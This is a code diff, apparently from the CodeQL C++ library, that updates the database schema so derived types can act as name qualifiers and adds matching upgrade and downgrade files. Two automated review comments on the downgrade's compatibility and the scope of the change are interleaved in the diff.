+| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = @assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 
83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 
131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = 
@ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr 
+ | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + 
+new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + +sizeof_bind( + unique int expr: @sizeof_or_alignof ref, + int type_id: @type ref +); + +code_block( + unique int block: @literal ref, + unique int routine: @function ref +); + +lambdas( + unique int expr: @lambdaexpr ref, + string default_capture: string ref, + boolean has_explicit_return_type: boolean ref, + boolean has_explicit_parameter_list: boolean ref +); + +lambda_capture( + unique int id: @lambdacapture, + int lambda: @lambdaexpr ref, + int index: int ref, + int field: @membervariable ref, + 
boolean captured_by_reference: boolean ref, + boolean is_implicit: boolean ref, + int location: @location_default ref +); + +@funbindexpr = @routineexpr + | @new_expr + | @delete_expr + | @delete_array_expr + | @ctordirectinit + | @ctorvirtualinit + | @ctordelegatinginit + | @dtordirectdestruct + | @dtorvirtualdestruct; + +@varbindexpr = @varaccess | @ctorfieldinit | @dtorfielddestruct; +@addressable = @function | @variable ; +@accessible = @addressable | @enumconstant ; + +@access = @varaccess | @routineexpr ; + +fold( + int expr: @foldexpr ref, + string operator: string ref, + boolean is_left_fold: boolean ref +); + +stmts( + unique int id: @stmt, + int kind: int ref, + int location: @location_default ref +); + +case @stmt.kind of + 1 = @stmt_expr +| 2 = @stmt_if +| 3 = @stmt_while +| 4 = @stmt_goto +| 5 = @stmt_label +| 6 = @stmt_return +| 7 = @stmt_block +| 8 = @stmt_end_test_while // do { ... } while ( ... ) +| 9 = @stmt_for +| 10 = @stmt_switch_case +| 11 = @stmt_switch +| 13 = @stmt_asm // "asm" statement or the body of an asm function +| 15 = @stmt_try_block +| 16 = @stmt_microsoft_try // Microsoft +| 17 = @stmt_decl +| 18 = @stmt_set_vla_size // C99 +| 19 = @stmt_vla_decl // C99 +| 25 = @stmt_assigned_goto // GNU +| 26 = @stmt_empty +| 27 = @stmt_continue +| 28 = @stmt_break +| 29 = @stmt_range_based_for // C++11 +// ... 30 @stmt_at_autoreleasepool_block deprecated +// ... 31 @stmt_objc_for_in deprecated +// ... 32 @stmt_at_synchronized deprecated +| 33 = @stmt_handler +// ... 
34 @stmt_finally_end deprecated +| 35 = @stmt_constexpr_if +| 37 = @stmt_co_return +| 38 = @stmt_consteval_if +| 39 = @stmt_not_consteval_if +| 40 = @stmt_leave +; + +type_vla( + int type_id: @type ref, + int decl: @stmt_vla_decl ref +); + +variable_vla( + int var: @variable ref, + int decl: @stmt_vla_decl ref +); + +type_is_vla(unique int type_id: @derivedtype ref) + +if_initialization( + unique int if_stmt: @stmt_if ref, + int init_id: @stmt ref +); + +if_then( + unique int if_stmt: @stmt_if ref, + int then_id: @stmt ref +); + +if_else( + unique int if_stmt: @stmt_if ref, + int else_id: @stmt ref +); + +constexpr_if_initialization( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int init_id: @stmt ref +); + +constexpr_if_then( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int then_id: @stmt ref +); + +constexpr_if_else( + unique int constexpr_if_stmt: @stmt_constexpr_if ref, + int else_id: @stmt ref +); + +@stmt_consteval_or_not_consteval_if = @stmt_consteval_if | @stmt_not_consteval_if; + +consteval_if_then( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int then_id: @stmt ref +); + +consteval_if_else( + unique int constexpr_if_stmt: @stmt_consteval_or_not_consteval_if ref, + int else_id: @stmt ref +); + +while_body( + unique int while_stmt: @stmt_while ref, + int body_id: @stmt ref +); + +do_body( + unique int do_stmt: @stmt_end_test_while ref, + int body_id: @stmt ref +); + +switch_initialization( + unique int switch_stmt: @stmt_switch ref, + int init_id: @stmt ref +); + +#keyset[switch_stmt, index] +switch_case( + int switch_stmt: @stmt_switch ref, + int index: int ref, + int case_id: @stmt_switch_case ref +); + +switch_body( + unique int switch_stmt: @stmt_switch ref, + int body_id: @stmt ref +); + +@stmt_for_or_range_based_for = @stmt_for + | @stmt_range_based_for; + +for_initialization( + unique int for_stmt: @stmt_for_or_range_based_for ref, + int init_id: @stmt ref +); + +for_condition( + unique int 
for_stmt: @stmt_for ref, + int condition_id: @expr ref +); + +for_update( + unique int for_stmt: @stmt_for ref, + int update_id: @expr ref +); + +for_body( + unique int for_stmt: @stmt_for ref, + int body_id: @stmt ref +); + +@stmtparent = @stmt | @expr_stmt ; +stmtparents( + unique int id: @stmt ref, + int index: int ref, + int parent: @stmtparent ref +); + +ishandler(unique int block: @stmt_block ref); + +@cfgnode = @stmt | @expr | @function | @initialiser ; + +stmt_decl_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl: @declaration ref +); + +stmt_decl_entry_bind( + int stmt: @stmt_decl ref, + int num: int ref, + int decl_entry: @element ref +); + +@parameterized_element = @function | @stmt_block | @requires_expr; + +blockscope( + unique int block: @stmt_block ref, + int enclosing: @parameterized_element ref +); + +@jump = @stmt_goto | @stmt_break | @stmt_continue | @stmt_leave; + +@jumporlabel = @jump | @stmt_label | @literal; + +jumpinfo( + unique int id: @jumporlabel ref, + string str: string ref, + int target: @stmt ref +); + +preprocdirects( + unique int id: @preprocdirect, + int kind: int ref, + int location: @location_default ref +); +case @preprocdirect.kind of + 0 = @ppd_if +| 1 = @ppd_ifdef +| 2 = @ppd_ifndef +| 3 = @ppd_elif +| 4 = @ppd_else +| 5 = @ppd_endif +| 6 = @ppd_plain_include +| 7 = @ppd_define +| 8 = @ppd_undef +| 9 = @ppd_line +| 10 = @ppd_error +| 11 = @ppd_pragma +| 12 = @ppd_objc_import +| 13 = @ppd_include_next +| 14 = @ppd_ms_import +| 15 = @ppd_elifdef +| 16 = @ppd_elifndef +| 17 = @ppd_embed +| 18 = @ppd_warning +; + +@ppd_include = @ppd_plain_include | @ppd_objc_import | @ppd_include_next | @ppd_ms_import; + +@ppd_branch = @ppd_if | @ppd_ifdef | @ppd_ifndef | @ppd_elif | @ppd_elifdef | @ppd_elifndef; + +preprocpair( + int begin : @ppd_branch ref, + int elseelifend : @preprocdirect ref +); + +preproctrue(int branch : @ppd_branch ref); +preprocfalse(int branch : @ppd_branch ref); + +preproctext( + unique int id: 
@preprocdirect ref, + string head: string ref, + string body: string ref +); + +includes( + unique int id: @ppd_include ref, + int included: @file ref +); + +embeds( + unique int id: @ppd_embed ref, + int included: @file ref +); + +link_targets( + int id: @link_target, + int binary: @file ref +); + +link_parent( + int element : @element ref, + int link_target : @link_target ref +); + +/*- Database metadata -*/ + +/** + * The CLI will automatically emit applicable tuples for this table, + * such as `databaseMetadata("isOverlay", "true")` when building an + * overlay database. + */ +databaseMetadata( + string metadataKey: string ref, + string value: string ref +); + +/*- Overlay support -*/ + +/** + * The CLI will automatically emit tuples for each new/modified/deleted file + * when building an overlay database. + */ +overlayChangedFiles( + string path: string ref +); + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: 
@file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; diff --git a/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties new file mode 100644 index 000000000000..d3a842d2cbb5 --- /dev/null +++ b/cpp/downgrades/0853f43dc8c08deecb473c54a2b70da8597f1ab5/upgrade.properties @@ -0,0 +1,2 @@ +description: Fix NameQualifier inconsistency +compatibility: full diff --git a/cpp/ql/lib/semmle/code/cpp/Type.qll b/cpp/ql/lib/semmle/code/cpp/Type.qll index fa2d2d605d87..4069b58134be 100644 --- a/cpp/ql/lib/semmle/code/cpp/Type.qll +++ b/cpp/ql/lib/semmle/code/cpp/Type.qll @@ -1071,7 +1071,7 @@ class NullPointerType extends BuiltInType { * const float fa[40]; * ``` */ -class DerivedType extends Type, @derivedtype { +class DerivedType extends Type, NameQualifyingElement, @derivedtype { override string toString() { result = this.getName() } override string getName() { derivedtypes(underlyingElement(this), result, _, _) } diff --git a/cpp/ql/lib/semmlecode.cpp.dbscheme b/cpp/ql/lib/semmlecode.cpp.dbscheme index ef8d209a22e2..0853f43dc8c0 100644 --- a/cpp/ql/lib/semmlecode.cpp.dbscheme +++ b/cpp/ql/lib/semmlecode.cpp.dbscheme @@ -1430,7 +1430,8 @@ specialnamequalifyingelements( @namequalifyingelement = @namespace | @specialnamequalifyingelement | @usertype - | @decltype; + | @decltype + | @derivedtype; namequalifiers( unique int id: @namequalifier, diff --git a/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme new file mode 100644 index 000000000000..ef8d209a22e2 --- /dev/null 
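Review bot: The downgrade claims `compatibility: full` but registers no relation rewrite, so any `namequalifiers` row that refers to a `@derivedtype` qualifier would be carried unchanged into a database whose `@namequalifyingelement` union no longer admits it. If the extractor at the newer scheme can emit such rows, the downgraded database would fail the same consistency check this change is meant to fix, and queries over it could silently miss qualified names. A downgrade query that drops or remaps those rows, registered with a line such as `namequalifiers.rel: run namequalifiers.qlo`, would keep the older scheme valid. If that was judged unnecessary, the `description:` line should say why.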
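Review bot: `DerivedType` now extends `NameQualifyingElement` for every derived kind, and the matching `semmlecode.cpp.dbscheme` hunk adds the whole `@derivedtype` union, so pointers, arrays and routine pointers are admitted as name qualifiers alongside cv-qualified types. If the inconsistency only arises for specified types (not confirmed from this diff), narrowing the union to `| @type_with_specifiers` and moving the supertype to the corresponding QL class would leave the scheme check able to catch extractor bugs for the other kinds. Either way, the QLDoc above the class should gain a sentence saying when a derived type can qualify a name, since the visible tail of that comment only shows declaration examples. The class body continues outside the hunk.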
+++ b/cpp/ql/lib/upgrades/ef8d209a22e27413aaaeff4446f0ecb9fa2c227b/old.dbscheme 
@@ -0,0 +1,2577 @@ + +/*- Compilations -*/ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * gcc -c f1.c f2.c f3.c + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + /** + * An invocation of the compiler. Note that more than one file may + * be compiled per invocation. For example, this command compiles + * three source files: + * + * gcc -c f1.c f2.c f3.c + */ + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | *path to extractor* + * 1 | `--mimic` + * 2 | `/usr/bin/gcc` + * 3 | `-c` + * 4 | f1.c + * 5 | f2.c + * 6 | f3.c + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The expanded arguments that were passed to the extractor for a + * compiler invocation. This is similar to `compilation_args`, but + * for a `@someFile` argument, it includes the arguments from that + * file, rather than just taking the argument literally. + */ +#keyset[id, num] +compilation_expanded_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * Optionally, record the build mode for each compilation. + */ +compilation_build_mode( + unique int id : @compilation ref, + int mode : int ref +); + +/* +case @compilation_build_mode.mode of + 0 = @build_mode_none +| 1 = @build_mode_manual +| 2 = @build_mode_auto +; +*/ + +/** + * The source files that are compiled by a compiler invocation. 
+ * If `id` is for the compiler invocation + * + * gcc -c f1.c f2.c f3.c + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.c + * 1 | f2.c + * 2 | f3.c + * + * Note that even if those files `#include` headers, those headers + * do not appear as rows. + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. 
+ */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP 
filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. 
*/ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. 
